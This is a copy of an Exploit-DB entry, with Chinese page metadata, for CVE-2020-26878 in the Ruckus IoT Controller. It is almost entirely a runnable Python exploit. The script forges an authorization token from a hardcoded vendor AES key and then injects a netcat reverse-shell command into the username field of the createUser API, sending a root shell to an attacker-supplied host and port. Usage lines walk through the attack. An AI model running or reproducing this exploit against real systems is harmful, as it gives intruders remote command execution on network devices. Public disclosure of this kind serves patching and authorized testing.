Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 – Remote Code Execution

• Exploit Database
• 13 阅读

• 作者： Emre SUREN
  日期： 2020-11-27
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49110/

• # Product: Ruckus IoT Controller (Ruckus vRIoT)
  # Version: <= 1.5.1.0.21
  # Vendor: https://support.ruckuswireless.com/
  # Vulnerability: Command Injection & Broken Authentication
  # References: CVE-2020-26878
  # Discovered by: Juan Manuel Fernandez
  # Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
  # Exploit Author: Emre SUREN
  # Disclosure Date: 2020-10-26
  # Tested on: Appliance
  
  #!/usr/bin/python
  # -*- coding: utf-8 -*-
  
  import requests, urllib3, sys
  from Crypto.Cipher import AES
  from base64 import b64encode, b64decode
  from colorama import Fore
  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  
  def listen(lhost, lport):
  	opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
  	if opt == "y":
  		return True
  	else:
  		return False
  
  def generatePayload(lhost, lport):
  
  	payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
  
  	return payload
  
  def generateMagicToken():
  
  	enc_dec_method = 'utf-8'
  	salt = 'nplusServiceAuth'
  	salt = salt.encode("utf8")
  	str_key = 'serviceN1authent'
  	str_to_enc = 'TlBMVVMx'
  
  	return encrypt(enc_dec_method, salt, str_key, str_to_enc)
  
  def encrypt(enc_dec_method, salt, str_key, str_to_enc):
  
  	aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
  	hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
  	mret = b64encode(hx_enc).decode(enc_dec_method)
  
  	return mret
  
  def execCmd(rhost, rport, lhost, lport):
  
  	payload = generatePayload(lhost, lport)
  	post_data = {
  	 "username": payload,
  	 "password": "test"
  	}
  	print(Fore.BLUE + "[*] Payload\t: " + payload)
  
  	token = generateMagicToken()
  	headers = {
  		"Authorization": token
  	}
  
  	rpath = "/service/v1/createUser"
  	uri = 'https://' + rhost + ":" + rport + rpath
  
  	r = requests.post(uri, json=post_data, headers=headers, verify=False)
  	print(Fore.BLUE + "[*] Request sent")
  
  	if r.status_code == 200:
  		print(Fore.GREEN + "[+] Successful. Check for the session...")
  	else:
  		print(Fore.RED + "[X] Failed. Check for the response...")
  		print(Fore.BLUE + "[*] Response\t: " + r.text)
  		sys.exit()
  
  def main():
  
  	if (len(sys.argv) != 5):
  		print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
  		print("[*] <RHOST> -> Target IP")
  		print("[*] <RPORT> -> Target Port")
  		print("[*] <LHOST> -> Attacker IP")
  		print("[*] <LPORT> -> Attacker Port")
  		print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
  		exit(0)
  
  	rhost = sys.argv[1]
  	rport = sys.argv[2]
  	lhost = sys.argv[3]
  	lport = sys.argv[4]
  
  	if not listen(lhost, lport):
  		print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
  	else:
  		execCmd(rhost, rport, lhost, lport)
  
  if __name__ == "__main__":
  main()